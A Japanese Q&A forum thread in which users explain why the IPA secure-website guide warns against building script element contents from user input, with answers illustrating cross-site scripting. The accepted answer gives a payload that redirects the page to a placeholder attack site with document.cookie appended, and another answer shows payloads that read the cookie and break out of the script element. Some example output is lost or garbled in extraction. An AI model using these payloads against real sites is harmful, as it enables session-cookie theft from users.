要素の内

Question

▽安全なウェブサイトの作り方
　 http://www.ipa.go.jp/security/vuln/documents/web …

＞<script>...</script> 要素の内容を動的に生成しない
＞ウェブページに出力する<script>...</script>要素の内容が、外部からの入力に依存する形で動的に生成される場合、任意のスクリプトが埋め込まれてしまう可能性があります

・P25で上記のように書かれているのですが、理解できません(何故ここだけ動的生成してはいけないのか等)
・具体的にどのようにして埋め込まれる恐れがあるのでしょうか？
・またここで書いている内容は、下記何れを指しているのでしょうか？
・ココカラ<script>...</script>ココマデ
・<script>ココカラ...ココマデ</script>

Ogre7077 · Accepted Answer

攻撃の容易性でしょう。この脆弱性を付く攻撃をする際に一番苦労するのがそのサイト内で使用している cookie 内容を盗聴するために、以下のように攻撃できます。入力内容: ');window.location='http://攻撃サイト/'+document.cookie;a=(' 出力内容: 引用符のエスケープ処理で塞がれるかもしれませんが、それでも対処できる余地はあります。

b0a0a · Answer

主にサーバーサイドの話でしょう
例えば簡易掲示板で、名前をクリックすると本文がalertされるものを作ったとします

そこで
alert("内容")
とすると
内容が
「"+(function(){code})()+"」だと
aler("t"+(function(){code})()+"")
となって任意のコードを埋め込まれてしまうということです

本人が書き込んだ内容を本人のみに適応する場合はいいですが
第三者も見えるHTMLコードになる場合は気をつけてください

Chaire · Answer

ものすごく単純化しますが、・script 要素生成テンプレート：・利用者から入力されたデータ(1)： $name = "太郎" → ・利用者から入力されたデータ(2)： $name = "');var s=document.cookie;('" → ・利用者から入力されたデータ(3)： $name = "')

おはよう

" →

おはよう

です。'); (2) のようにして Cookie にアクセスできました。もちろん、このままでは Cookie 制限により他のドメインに紐付けられたデータを見ることはできませんが、危険であることに変わりありません。また、(3) は勝手に script 要素を終わらせ、任意の文字列を出力させています。この場合、$name を「HTML の script 要素内に埋め込まれる JavaScript に適した形」にエスケープする必要がありました。結構、ややこしい話なのですよ。例えば、script 要素内で "" をどうやってエスケープしますか？他の "

" のようなタグは？あるいは、今回は幸い(?) JavaScript の文字列への出力なので比較的楽なのですが、では文字列の形式を崩さないようにするには？そういう文法知識が曖昧なら、やらない方が無難です。まあ、上記のような名前程度なら、入力段階で "=" のような「名前に不適な文字」を刎ねてしまっても構いませんが。そもそも論として、スクリプト云々に関係なく、データを出力する際は必ず「出力する文脈に合わせて」データをエスケープしなければなりません。データ入力時点の「サニタイズ」で事が済むと思っている人が今でも多いですが、間違いです。

<script>...</script> 要素の内

攻撃の容易性でしょう。

主にサーバーサイドの話でしょう

ものすごく単純化しますが、

似たような質問が見つかりました

関連するカテゴリからQ&Aを探す

デイリーランキングこのカテゴリの人気デイリーQ&Aランキング

マンスリーランキングこのカテゴリの人気マンスリーQ&Aランキング